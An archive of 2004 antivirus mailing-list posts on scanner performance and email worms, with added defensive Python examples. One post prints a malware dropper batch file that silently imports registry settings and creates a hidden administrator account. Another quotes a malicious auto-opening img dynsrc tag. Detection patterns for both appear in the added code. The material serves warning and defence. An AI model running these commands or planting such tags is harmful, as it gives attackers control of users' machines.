[Declude.Virus] New virus?

2004-05-04 Thread Adrian Hauri
I've just received a fake Microsoft email with a 744 KB "patch" attached.
It was not detected by my Norton, nor by F-Prot, AVG or McAfee.

The patch contains a start batch file which does this:

@echo off
copy _sys1.cab %windir%\system32\raddrv.dll
cls
copy _user1.cab %windir%\system32\admdll.dll
cls
copy data1.cab %windir%\system32\cmdll32.exe
cls
copy layout.bin %windir%\system32\settings.reg
cls
copy MSCOMCTL.OCX %windir%\system32\MSCOMCTL.OCX
cls
regedit.exe /s %windir%\system32\settings.reg
net user system_support {u-r-fucked} /ADD /ACTIVE:YES /EXPIRES:NEVER /TIMES:ALL
net localgroup "Administrators" "system_support" /ADD
cls
UPDATE.EXE
cls
exit

I've attached the email without the virus so you can have a look at it.

Adrian
--- Begin Message ---

Critical announcements

An important security announcement to all Microsoft Windows users!

Critical Security Update for Microsoft Windows (KB2856093)

A critical security issue has been identified that could allow an attacker to
compromise a computer running Windows and gain control over your system and
files. This issue has been discussed in KB2856093 Microsoft Knowledge Base.
Microsoft Security Response Team recommends to protect your computer by
installing this update from Microsoft.

Patch Information:

Type: Critical Security Update
Vulnerability: High
Vendor notified: April 29, 2004
Update Release Date: May 02, 2004
Download Size: 744 KB, < 2 minutes @ 28.8 modem
File Name: WINDOWS-KB2856093-X86-ENU.EXE
Affected Versions: Microsoft Windows 95/98/ME/NT/2000/XP/2003

To install this update, follow these instructions:

1. Download WINDOWS-KB2856093-X86-ENU.EXE file from Windows Update site or
   open an attached file.
2. Launch WINDOWS-KB2856093-X86-ENU.EXE and follow on-screen instructions.
3. After you install this item, you may have to restart your computer, to
   ensure a full protection.

©2004 Microsoft Corporation. All rights reserved.

Terms of Use | Privacy Statement

--- End Message ---

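The batch file quoted above is a typical dropper: it copies several files into %windir%\system32, imports registry settings silently, creates a local account and puts it into the Administrators group. As an added example that is not part of the original post or of Declude, here is a small Python heuristic a mail gateway could run over a batch file extracted from an attachment. The rule ids, the "two distinct rules" blocking threshold and the benign sample are my own; the suspect sample is the batch from the post with its wrapped line re-joined and the password argument redacted.

```python
import re

# Constructed sample: the dropper batch file quoted in the post above, with the
# password argument redacted and the wrapped "net user" line re-joined.
SUSPECT_BATCH = r"""@echo off
copy _sys1.cab %windir%\system32\raddrv.dll
cls
copy _user1.cab %windir%\system32\admdll.dll
cls
copy data1.cab %windir%\system32\cmdll32.exe
cls
copy layout.bin %windir%\system32\settings.reg
cls
copy MSCOMCTL.OCX %windir%\system32\MSCOMCTL.OCX
cls
regedit.exe /s %windir%\system32\settings.reg
net user system_support {password-redacted} /ADD /ACTIVE:YES /EXPIRES:NEVER /TIMES:ALL
net localgroup "Administrators" "system_support" /ADD
cls
UPDATE.EXE
cls
exit
"""

# Constructed benign sample for comparison: an ordinary backup script.
BENIGN_BATCH = r"""@echo off
copy report.txt D:\backup\report.txt
echo done
"""

# Each rule: (id, per-line pattern, reason). Matching is case-insensitive because
# cmd.exe is, so "NET USER" and "net user" must score the same.
RULES = [
    ("local-account-creation",
     re.compile(r"^\s*net\s+user\s+\S+(?:\s+\S+)?\s+/add\b", re.I),
     "creates a local user account"),
    ("admin-group-add",
     re.compile(r'^\s*net\s+localgroup\s+"?administrators"?\s+.*/add\b', re.I),
     "adds an account to the local Administrators group"),
    ("silent-registry-import",
     re.compile(r"^\s*regedit(?:\.exe)?\s+/s\b", re.I),
     "imports a .reg file without prompting"),
    ("system32-drop",
     re.compile(r"^\s*copy\s+\S+\s+%(?:windir|systemroot)%\\system32\\", re.I),
     "copies a file into the system directory"),
]


def scan_batch(text):
    """Return one finding per (line, rule) match: line number, rule id, reason and the line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule_id, pattern, reason in RULES:
            if pattern.search(line):
                findings.append({"line": lineno, "rule": rule_id,
                                 "reason": reason, "text": line.strip()})
    return findings


def verdict(findings, min_distinct_rules=2):
    """'block' when at least min_distinct_rules different rules fired, else 'allow'.
    Returns (decision, sorted rule ids) so the caller can log why."""
    rules = sorted({f["rule"] for f in findings})
    decision = "block" if len(rules) >= min_distinct_rules else "allow"
    return decision, rules


if __name__ == "__main__":
    for name, sample in (("suspect", SUSPECT_BATCH), ("benign", BENIGN_BATCH)):
        found = scan_batch(sample)
        decision, rules = verdict(found)
        print(f"{name}: {decision} ({len(found)} findings; rules: {', '.join(rules) or 'none'})")
        for f in found:
            print(f"  line {f['line']}: {f['rule']} - {f['reason']}: {f['text']}")
```

Requiring two distinct rules rather than one keeps a lone `copy` into system32 (which some legitimate installers do) from blocking on its own; account creation plus Administrators membership is the combination that makes this sample unambiguous.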

[Declude.Virus] Dangerous img dynsrc tag in body

2004-04-20 Thread Adrian Hauri
Just for your information:

We received a couple of spam emails (fake eBay notifications) with the
following dangerous tag in the body:

http://68.192.132.122_:8067/')>
(I added the _ at the end so it doesn't harm anyone)

As soon as you open the email, the window will open the url.
The website hosts a dangerous ActiveX script that gets executed as soon as
you open the website.

The antivirus scanners (F-Prot, AVG, McAfee) did not find a virus in the email
and let it through because it's just an HTML tag.

I added a body filter that searches for "http://www.declude.com)]

---
This E-mail came from the Declude.Virus mailing list.  To
unsubscribe, just send an E-mail to [EMAIL PROTECTED], and
type "unsubscribe Declude.Virus".The archives can be found
at http://www.mail-archive.com.

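The post above describes a body filter that catches the img dynsrc tag (the filter string itself did not survive in the archive). As an added example, not part of the original post or of Declude, here is a Python body filter built on the standard library HTML parser. It holds a message when any tag carries a `dynsrc` attribute, or when any attribute value resolves to a `javascript:` or `vbscript:` URL after entity decoding and whitespace stripping, so entity-encoded or space-padded variants are caught as well (that generalisation is mine). The sample bodies are constructed; the host 192.0.2.10 is a documentation address standing in for the real one.

```python
from html.parser import HTMLParser

# Constructed sample in the style of the fake eBay notification described above.
SAMPLE_BODY = """<html><body>
<p>Dear eBay member, please review your account.</p>
<img src="http://mail.example.invalid/logo.gif" width="100" height="30">
<IMG DYNSRC="javascript:window.open('http://192.0.2.10:8067/')">
<a href=" &#106;avascript:alert(1)">Sign in</a>
</body></html>
"""

# Constructed benign sample: an ordinary image, no script URLs.
BENIGN_BODY = """<html><body><p>Hello</p>
<img src="http://mail.example.invalid/logo.gif"></body></html>"""

SCRIPT_SCHEMES = ("javascript:", "vbscript:")


def normalize_url(value):
    """Lower-case and drop whitespace/control characters so 'java\\nscript:' and
    ' javascript:' compare equal to 'javascript:' for the scheme test."""
    if value is None:
        return ""
    return "".join(ch for ch in value if ord(ch) > 32).lower()


class MailBodyFilter(HTMLParser):
    """Collects (tag, attribute, value, reason) for dangerous attributes in start tags.
    HTMLParser lower-cases tag and attribute names and decodes entities in values,
    which is what makes the normalisation above sufficient."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name == "dynsrc":
                self.hits.append((tag, name, value, "dynsrc attribute"))
            if normalize_url(value).startswith(SCRIPT_SCHEMES):
                self.hits.append((tag, name, value, "script URL in attribute"))


def scan_html_body(html):
    """Return the list of hits for an HTML mail body (empty when nothing matched)."""
    parser = MailBodyFilter()
    parser.feed(html)
    parser.close()
    return parser.hits


def should_hold(html):
    """Gateway decision: hold the message if any hit was recorded."""
    return bool(scan_html_body(html))


if __name__ == "__main__":
    for label, body in (("sample", SAMPLE_BODY), ("benign", BENIGN_BODY)):
        print(f"{label}: {'HOLD' if should_hold(body) else 'pass'}")
        for tag, name, value, reason in scan_html_body(body):
            print(f"  <{tag} {name}=...>: {reason}")
```

A plain substring match on the literal tag, as the post's filter presumably did, misses the upper-case and entity-encoded forms above; parsing the attributes and checking the decoded scheme closes that gap without needing a signature for each variant.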

Re: [Declude.Virus] Faster second scanner needed

2004-03-30 Thread Adrian Hauri



My AV scanners are running a bit slower than yours because the server is not
very new and fancy and we do not have that much traffic:

PIII 666
256MB RAM
IDE RAID1 with old 2x30GB HD (2-3 years old)

I guess with RAID10, new HD, dual P4 and more RAM this would speed it up 10x.
Anyway, the proportions in the time consumption should be similar.

Adrian

-

  - Original Message -
  From: Matt
  To: [EMAIL PROTECTED]
  Sent: Wednesday, March 31, 2004 3:04 PM
  Subject: Re: [Declude.Virus] Faster second scanner needed

  Adrian,

  This is helpful, however the control is different as mine was based on the
  32 bit version of F-Prot (fpcmd.exe). It appears from your logs that 16 bit
  F-Prot beat out 32-bit McAfee by 50% or more. I'm not sure if the F-Prot
  being 16 bit had all that much effect, but one would expect for it to be
  slower than the 32 bit version. On my system, F-Prot can detect a virus in
  about 0.1 seconds, and the 32-bit version of AVG takes about 0.4 seconds
  (standard 30 KB Netsky/Bagle variants during low load).

  Note that most of the delay with AVG in 16-bit mode is that it runs within
  NTVDM. This goes away when you switch to the 32-bit version 7 which now
  supports the error codes that Declude uses. The switch though didn't seem to
  do much to the processor utilization, however the wider window does keep
  more concurrent processes open at the same time and that isn't optimal.

  Thanks,

  Matt

  Adrian Hauri wrote:

AVG takes about 4 seconds to fire up the AV engine and scan. I'm running the
16-bit version 6 of AVG.
I would recommend you to use McAfee. I have used version 4.32 for more than a
year now and it is as fast as F-Prot.
Also it was the first and only AV scanner for several days that was able to
detect viruses in password protected zip files like Bagle.
Here is part of my logfile from another server running my own script with
Stalker CommuniGate Pro:

01:07:33.69 4 EXTFILTER(ANTIVIRUS) inp(39): * start virusscan for Queue\1760059.msg
01:07:34.67 4 EXTFILTER(ANTIVIRUS) inp(97): * Found the W32/[EMAIL PROTECTED] virus !!! in Queue\1760059.msg MCAFEE.
01:07:35.28 4 EXTFILTER(ANTIVIRUS) inp(54): * Message Queue\1760059.msg seems to be clean (F-Prot)
01:07:39.28 4 EXTFILTER(ANTIVIRUS) inp(83): * identified I-Worm/Netsky.Q in Queue\1760059.msg With AVG

13:13:21.11 4 EXTFILTER(ANTIVIRUS) inp(39): * start virusscan for Queue\1750545.msg
13:13:22.72 4 EXTFILTER(ANTIVIRUS) inp(93): * Found the W32/[EMAIL PROTECTED] virus !!! in Queue\1750545.msg  MCAFEE.
13:13:23.61 4 EXTFILTER(ANTIVIRUS) inp(87): * Infection: W32/[EMAIL PROTECTED] in Queue\1750545.msg  FPROT.
13:13:27.96 4 EXTFILTER(ANTIVIRUS) inp(83): * identified I-Worm/Netsky.C in Queue\1750545.msg AVG.


I hope this helps to compare the speed. F-Prot is the 16-bit F-Prot for DOS
version.


Adrian


-
- Original Message -
From: "Matt" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, March 31, 2004 10:38 AM
Subject: [Declude.Virus] Faster second scanner needed


  
As I continue to research opportunities for increasing efficiency in
order to extend the life of my current environment, I have identified
AVG Anti-Virus as one of the biggest processor hogs, and holder of the
most opportunity.  F-Prot is 4 times faster, and maybe more efficient
than that when it comes to processor utilization.  Outside of
efficiency, AVG has proven to be a good second scanner, and this should
only be an issue if you are approaching the capacity of your
environment.  With AVG commented out and only F-Prot running, the peaks
are much shorter and much lower, but I can ride 100% for over 5 seconds
several times a minute during rush hours with both scanners enabled.

Everything that I've read about Kaspersky seems to indicate that they
are the fastest at detecting new viruses, but their "File Server"
edition costs $370 retail, and 70% of that yearly.  I suppose that I
might be able to find this much cheaper through a wholesaling source.

My main concern though is efficiency, and I would take an average
scanner if it was the most efficient over the best scanner if it was
average in terms of efficiency.  If anyone has some first hand knowledge
concerning efficiency of any of the scanners, please let me know.  I
believe this can be tracked by doing the following if you use F-Prot as
one of two or more scanners:

1) Change to LOGLEVEL DEBUG in your Virus.config
2) Wait for three viruses to be blocked (not 1K EICAR tests, the
real deal).
3) Change your LOGLEVEL back to its normal setting.
4) Compare the times logged for each scanner (you can post them here
or E-mail them to me and I would be happy to decipher)

I would imagine that with most 32 bit scanners, the difference in time
will be directly related to the processing power required to run the
scanner, or at least that holds true for the comp

Re: [Declude.Virus] Netsky.P Occasionally Slips through?

2004-03-30 Thread Adrian Hauri
The same happens here with F-Prot for DOS:

14:57:39.69 4 EXTFILTER(ANTIVIRUS) inp(39): * start virusscan for Queue\1730292.msg
14:57:40.64 4 EXTFILTER(ANTIVIRUS) inp(97): * Found the W32/[EMAIL PROTECTED] virus !!! in Queue\1730292.msg MCAFEE.
14:57:41.36 4 EXTFILTER(ANTIVIRUS) inp(54): * Message Queue\1730292.msg seems to be clean (F-Prot)
14:57:45.31 4 EXTFILTER(ANTIVIRUS) inp(83): * identified I-Worm/Netsky.Q in Queue\1730292.msg  AVG.


Adrian

-
- Original Message -
From: "Jonathan" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, March 30, 2004 12:43 PM
Subject: Re: [Declude.Virus] Netsky.P Occasionally Slips through?


> I sent one. There have been several, not sure if the one I sent is
> indicative of all of them, but it's the only one I could easily get out of
> a local quarantine.
>
> Jonathan
>
> At 07:51 PM 3/29/2004, you wrote:
>
>
> >>F-Prot's manual scan results:
> >>C:\eudora\ATTACH\document_all02c.zip->document.txt
> >>  a security risk or a "backdoor" program
> >
> >That sounds like an exit code of 8, meaning that F-Prot detected a
> >suspicious file, but not a virus.
> >
> >Would it be possible to E-mail the .ZIP file to the declude.com
virustrap@
> >address, so we can analyze it?
> >
> >-Scott
> >---
> >Declude JunkMail: The advanced anti-spam solution for IMail mailservers
> >since 2000.
> >Declude Virus: Ultra reliable virus detection and the leader in
mailserver
> >vulnerability detection.
> >Find out what you've been missing: Ask for a free 30-day evaluation.



Re: [Declude.Virus] Faster second scanner needed

2004-03-30 Thread Adrian Hauri
AVG takes about 4 seconds to fire up the AV engine and scan. I'm running the
16-bit version 6 of AVG.
I would recommend you to use McAfee. I have used version 4.32 for more than a
year now and it is as fast as F-Prot.
Also it was the first and only AV scanner for several days that was able to
detect viruses in password protected zip files like Bagle.
Here is part of my logfile from another server running my own script with
Stalker CommuniGate Pro:

01:07:33.69 4 EXTFILTER(ANTIVIRUS) inp(39): * start virusscan for Queue\1760059.msg
01:07:34.67 4 EXTFILTER(ANTIVIRUS) inp(97): * Found the W32/[EMAIL PROTECTED] virus !!! in Queue\1760059.msg MCAFEE.
01:07:35.28 4 EXTFILTER(ANTIVIRUS) inp(54): * Message Queue\1760059.msg seems to be clean (F-Prot)
01:07:39.28 4 EXTFILTER(ANTIVIRUS) inp(83): * identified I-Worm/Netsky.Q in Queue\1760059.msg With AVG

13:13:21.11 4 EXTFILTER(ANTIVIRUS) inp(39): * start virusscan for Queue\1750545.msg
13:13:22.72 4 EXTFILTER(ANTIVIRUS) inp(93): * Found the W32/[EMAIL PROTECTED] virus !!! in Queue\1750545.msg  MCAFEE.
13:13:23.61 4 EXTFILTER(ANTIVIRUS) inp(87): * Infection: W32/[EMAIL PROTECTED] in Queue\1750545.msg  FPROT.
13:13:27.96 4 EXTFILTER(ANTIVIRUS) inp(83): * identified I-Worm/Netsky.C in Queue\1750545.msg AVG.


I hope this helps to compare the speed. F-Prot is the 16-bit F-Prot for DOS
version.


Adrian


-
- Original Message -
From: "Matt" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, March 31, 2004 10:38 AM
Subject: [Declude.Virus] Faster second scanner needed


> As I continue to research opportunities for increasing efficiency in
> order to extend the life of my current environment, I have identified
> AVG Anti-Virus as one of the biggest processor hogs, and holder of the
> most opportunity.  F-Prot is 4 times faster, and maybe more efficient
> than that when it comes to processor utilization.  Outside of
> efficiency, AVG has proven to be a good second scanner, and this should
> only be an issue if you are approaching the capacity of your
> environment.  With AVG commented out and only F-Prot running, the peaks
> are much shorter and much lower, but I can ride 100% for over 5 seconds
> several times a minute during rush hours with both scanners enabled.
>
> Everything that I've read about Kaspersky seems to indicate that they
> are the fastest at detecting new viruses, but their "File Server"
> edition costs $370 retail, and 70% of that yearly.  I suppose that I
> might be able to find this much cheaper through a wholesaling source.
>
> My main concern though is efficiency, and I would take an average
> scanner if it was the most efficient over the best scanner if it was
> average in terms of efficiency.  If anyone has some first hand knowledge
> concerning efficiency of any of the scanners, please let me know.  I
> believe this can be tracked by doing the following if you use F-Prot as
> one of two or more scanners:
>
> 1) Change to LOGLEVEL DEBUG in your Virus.config
> 2) Wait for three viruses to be blocked (not 1K EICAR tests, the
> real deal).
> 3) Change your LOGLEVEL back to its normal setting.
> 4) Compare the times logged for each scanner (you can post them here
> or E-mail them to me and I would be happy to decipher)
>
> I would imagine that with most 32 bit scanners, the difference in time
> will be directly related to the processing power required to run the
> scanner, or at least that holds true for the comparison between F-Prot
> and AVG on my system.  Note that the times between systems shouldn't be
> compared, only the relative multiple of the second scanner to F-Prot
> should be compared, that way you establish F-Prot's time as being the
> control.
>
> I'm primarily interested in Kaspersky, ClamAV and McAfee, in that order,
> though I'm welcome to suggestions for other products that don't prohibit
> command line scanning of E-mail in their licenses.
>
> Anecdotal evidence is also appreciated :)
>
> Thanks,
>
> Matt
>
> --
> =
> MailPure custom filters for Declude JunkMail Pro.
> http://www.mailpure.com/software/
> =

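Matt's quoted procedure ends with comparing the logged times of each scanner, with F-Prot as the control so that numbers from different machines stay comparable. As an added example that is not part of the thread or of Declude, here is a Python parser for the CommuniGate Pro EXTFILTER lines Adrian posted (line wraps re-joined; the archive's "[EMAIL PROTECTED]" redaction of the virus names left as it is). It attributes the gap between consecutive log lines to the scanner that reported, which assumes the scanners run one after another as the log ordering shows, then expresses each scanner's average as a multiple of F-Prot's. Scanner name patterns and the output layout are my own.

```python
import re
from statistics import mean

# Sample input: the EXTFILTER lines from the post above, wraps undone.
SAMPLE_LOG = r"""
01:07:33.69 4 EXTFILTER(ANTIVIRUS) inp(39): * start virusscan for Queue\1760059.msg
01:07:34.67 4 EXTFILTER(ANTIVIRUS) inp(97): * Found the W32/[EMAIL PROTECTED] virus !!! in Queue\1760059.msg MCAFEE.
01:07:35.28 4 EXTFILTER(ANTIVIRUS) inp(54): * Message Queue\1760059.msg seems to be clean (F-Prot)
01:07:39.28 4 EXTFILTER(ANTIVIRUS) inp(83): * identified I-Worm/Netsky.Q in Queue\1760059.msg With AVG

13:13:21.11 4 EXTFILTER(ANTIVIRUS) inp(39): * start virusscan for Queue\1750545.msg
13:13:22.72 4 EXTFILTER(ANTIVIRUS) inp(93): * Found the W32/[EMAIL PROTECTED] virus !!! in Queue\1750545.msg  MCAFEE.
13:13:23.61 4 EXTFILTER(ANTIVIRUS) inp(87): * Infection: W32/[EMAIL PROTECTED] in Queue\1750545.msg  FPROT.
13:13:27.96 4 EXTFILTER(ANTIVIRUS) inp(83): * identified I-Worm/Netsky.C in Queue\1750545.msg AVG.
""".strip().splitlines()

# "HH:MM:SS.cc <level> EXTFILTER(ANTIVIRUS) inp(<n>): * <message>"
LINE = re.compile(
    r"^(\d{2}):(\d{2}):(\d{2})\.(\d{2})\s+\d+\s+EXTFILTER\(ANTIVIRUS\)\s+inp\(\d+\):\s+\*\s+(?P<msg>.*)$"
)

# How each scanner names itself in its result line (assumed from the sample; order matters
# only in that the first pattern to match wins).
SCANNER_PATTERNS = [
    ("F-Prot", re.compile(r"f-?prot", re.I)),
    ("McAfee", re.compile(r"mcafee", re.I)),
    ("AVG", re.compile(r"\bavg\b", re.I)),
]

DAY = 24 * 60 * 60 * 100  # centiseconds per day, for scans that straddle midnight


def to_centiseconds(h, m, s, cs):
    return ((int(h) * 60 + int(m)) * 60 + int(s)) * 100 + int(cs)


def parse_scan_log(lines):
    """Group lines into scans. Each scanner's time (in centiseconds) is the gap between
    its result line and the previous line of the same scan."""
    scans = []
    current = None
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue
        t = to_centiseconds(*m.groups()[:4])
        msg = m.group("msg")
        if msg.lower().startswith("start virusscan"):
            current = {"message": msg.split()[-1], "start": t, "last": t, "scanners": {}}
            scans.append(current)
            continue
        if current is None:
            continue
        for name, pattern in SCANNER_PATTERNS:
            if pattern.search(msg):
                current["scanners"][name] = (t - current["last"]) % DAY
                current["last"] = t
                break
    return scans


def scanner_summary(scans, control="F-Prot"):
    """Average centiseconds per scanner over all scans, plus that average as a
    multiple of the control scanner's (None if the control never appeared)."""
    samples = {}
    for scan in scans:
        for name, centis in scan["scanners"].items():
            samples.setdefault(name, []).append(centis)
    averages = {name: mean(values) for name, values in samples.items()}
    base = averages.get(control)
    return {name: {"avg_centis": avg, "x_control": round(avg / base, 2) if base else None}
            for name, avg in averages.items()}


if __name__ == "__main__":
    scans = parse_scan_log(SAMPLE_LOG)
    for scan in scans:
        times = ", ".join(f"{n} {c / 100:.2f}s" for n, c in scan["scanners"].items())
        print(f"{scan['message']}: {times}")
    for name, row in scanner_summary(scans).items():
        print(f"{name:8} avg {row['avg_centis'] / 100:.2f}s  x{row['x_control']} of F-Prot")
```

On these two scans the multiples are roughly 1.7x for McAfee and 5.6x for AVG, which is the kind of control-relative figure Matt asked for; with the debug log from a busier server the averages become meaningful rather than anecdotal.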


Re: [Declude.Virus] W32.Beagle.J@mm cannot be caught

2004-03-09 Thread Adrian Hauri
Please read the old posts about this problem.

Short summary:
Antivirus programs and Declude can't open password protected zip files
(F-Prot, McAfee, AVG) unless they try to find a password within the email
and use this to unlock the zip file (Kaspersky). Some virus scanners block
password protected zip files in general and declare them as a virus
(Symantec/Norton AV) even though they couldn't scan within the zip file.

Scott added the feature BANEXT EZIP in the interim release >= i8 to block
all password protected zip files on the server with Declude.

Interim release: http://www.declude.com/interim

(I would recommend you to install a second AV because it took F-Prot too
long to update their definitions the last few months.)

Adrian


-
- Original Message -
From: "terry ip" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, March 10, 2004 12:43 PM
Subject: [Declude.Virus] [EMAIL PROTECTED] cannot be caught


> Hi All,
>
> Desktop Norton caught but declude didn't. I'm using Declude 1.75 + F-prot
> 3.14a with the latest virus pattern. Anyone have the same problem as I'm?
or
> any cure on this? Thanks.
>
> Terry
>

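The post above explains why a scanner cannot look inside a password protected zip and that Declude's BANEXT EZIP simply bans such attachments. As an added example that is not part of the post or of Declude's own code, here is the check in Python: the ZIP format marks an encrypted member with bit 0 of the general-purpose flag in both the local and central headers, so a gateway can spot an unscannable archive without attempting to unpack it. The decision strings and the sample builder are my own; the sample archive is constructed in memory, with the encryption bit set by hand because the standard library cannot write encrypted zips.

```python
import io
import struct
import zipfile

ENCRYPTED = 0x0001  # bit 0 of the ZIP general-purpose bit flag: member is encrypted


def encrypted_members(data):
    """Names of members flagged as encrypted, or None if the bytes are not a ZIP."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return [info.filename for info in zf.infolist() if info.flag_bits & ENCRYPTED]
    except zipfile.BadZipFile:
        return None


def gateway_decision(data):
    """What a BANEXT EZIP style gateway would do with an attachment."""
    members = encrypted_members(data)
    if members is None:
        return "pass-to-scanners"   # not a ZIP: normal AV scanning applies
    if members:
        return "ban-encrypted-zip"  # unscannable, so ban rather than trust it
    return "scan-zip"


def build_sample_zip(encrypted):
    """Constructed sample: a one-member STORED archive. With encrypted=True the
    encryption bit is set in the local file header (flag at offset 6) and the
    central directory entry (flag at offset 8); the data stays in the clear, which
    is all a flag-based check looks at."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("document.txt", b"sample text, not a real worm")
    data = bytearray(buf.getvalue())
    if encrypted:
        for signature, flag_offset in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
            pos = data.find(signature)
            (flags,) = struct.unpack_from("<H", data, pos + flag_offset)
            struct.pack_into("<H", data, pos + flag_offset, flags | ENCRYPTED)
    return bytes(data)


if __name__ == "__main__":
    for label, blob in (("plain zip", build_sample_zip(False)),
                        ("encrypted zip", build_sample_zip(True)),
                        ("not a zip", b"MZ this is not an archive")):
        print(f"{label}: {gateway_decision(blob)} (encrypted members: {encrypted_members(blob)})")
```

The check reads only the central directory, so it costs nothing compared to a scan and does not depend on a scanner vendor adding password guessing; whether banning is acceptable for legitimate encrypted archives is the policy question the thread is really about.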


[Declude.Virus] Does anyone have a AVG V6.0 Update script?

2004-02-26 Thread Adrian Hauri



Does anyone have an AVG V6.0 update script that can be run as a batch file?
There is a V7.0 batch file available which doesn't work for version 6.0.

I would like to update AVG V6.0 several times a day. The built-in updater and
scheduler is crap and doesn't work when you are not logged in. Also it can run
just once within 24h.

Thanks for your help.

Adrian
 


Re: [Declude.Virus] AVG V6 much slower than FProt and McAfee

2004-02-25 Thread Adrian Hauri
> Currently only the 16-bit version works with Declude, the 32-bit version
> will soon.
> 16-bit apps have a big performance hit because they run under NTVDM.

I think it's not a 16-bit/32-bit issue. My F-Prot also runs in the 16-bit DOS
version and is much faster than AVG.
(I tested it with CommuniGate Pro and not with IMail/Declude.)

Try to run AVG from the command line and then you'll know what I mean.
Type this at the command prompt:
C:\Progra~1\Grisoft\AVG6\avg.exe /NOMEM /NOSELF /ARC /REPORT=report.txt *.123
The scanning itself takes less than 1 sec, but the startup takes 2 seconds.

When AVG starts up, it also shows the following:
AVG_6_0_Dos32_Init (c) GRISOFT, s.r.o, 1999-2003

Does it mean that it runs in 32-bit mode or does it just detect a 32-bit DOS
environment?


Adrian


- Original Message -
From: Matt
To: [EMAIL PROTECTED]
Sent: Thursday, February 26, 2004 2:44 PM
Subject: Re: [Declude.Virus] AVG V6 much slower than FProt and McAfee


Currently only the 16-bit version works with Declude, the 32-bit version
will soon.  16-bit apps have a big performance hit because they run under
NTVDM.

Matt



Adrian Hauri wrote:

I just installed AVG 6.0 free edition and it seems that it takes a long time
to fire it up:

14:24:10.40 * start virus scan
14:24:11.35 * Found: EICAR test file NOT a virus. (MCAFEE 4.5)
14:24:11.95 * Infection: EICAR_Test_File (FPROT 3.5)
14:24:15.78 * identified EICAR_Test (AVG 6.0)

I used for all virus scanners the string from the declude virus manual site.

It takes AVG approx. 3 seconds to start up before scanning compared to 1
second for the other scanners. The scanning itself seems to be fast, it's
just the start-up.

Is this normal? Has anyone else the same performance problem?

Thanks for your help.

Adrian



Re: [Declude.Virus] BANnotify.eml

2004-02-25 Thread Adrian Hauri
go to http://www.declude.com/virus/manual.htm to get the latest update.

Cheers

Adrian

-

ToadShow Pty Ltd
phone: 07 3004 7900
fax: 07 3846 1220
email: [EMAIL PROTECTED]
http://www.toadshow.com.au

-
- Original Message -
From: "David Dodell" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Thursday, February 26, 2004 3:06 PM
Subject: [Declude.Virus] BANnotify.eml


> Can someone send me a copy of their Bannotify.eml ...
>
> David
>



[Declude.Virus] TCP WAIT TIME

2003-08-21 Thread Adrian Hauri
Have any of you guys ever had this problem? It could be helpful during the
high traffic time that the Sobig virus causes:
http://www.stalker.com/CommuniGatePro/Scalability.html#TimeWait


Adrian

